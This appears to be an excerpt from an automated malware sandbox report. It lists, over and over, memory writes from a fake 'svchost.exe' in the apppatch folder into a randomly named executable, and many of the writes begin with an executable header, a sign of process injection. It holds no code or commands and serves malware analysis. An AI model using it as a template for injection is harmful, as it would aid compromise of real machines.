      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C12000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 6B2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BF2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2822000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D52000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F42000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2732000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D72000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1052000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2912000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: EE2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B72000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3032000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2862000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D92000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 802000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C02000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2B72000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9D2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2252000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FB2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2552000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F42000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F42000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 7E2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1462000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2902000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 23E2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D22000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1562000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Windows\apppatch\svchost.exe base: 31E2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Windows\apppatch\svchost.exe base: 31E2000 value starts with: 4D5AJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E40000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E41000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E42000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E94000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D50000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D51000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D52000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1280000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1281000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1282000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 12D4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9A0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9A1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9A2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9F4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2E40000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2E41000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2E42000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2E94000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D80000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D81000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D82000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2DD4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C20000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C21000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C22000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C74000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B90000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B91000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B92000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BE4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1020000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1021000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1022000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1074000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2340000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2341000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2342000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2394000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3010000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3011000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3012000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3064000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 850000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 851000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 852000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 8A4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2960000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2961000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2962000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 29B4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2EE4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2650000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2651000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2652000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 26A4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E40000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E41000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E42000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E94000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: A40000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: A41000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: A42000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: A94000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B00000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B01000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B02000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B54000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2880000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2881000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2882000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 28D4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2C70000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2C71000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2C72000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2CC4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2DD0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2DD1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2DD2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2E24000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BF4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1320000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1321000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1322000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1374000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BF4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2F40000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2F41000Jump to behavior
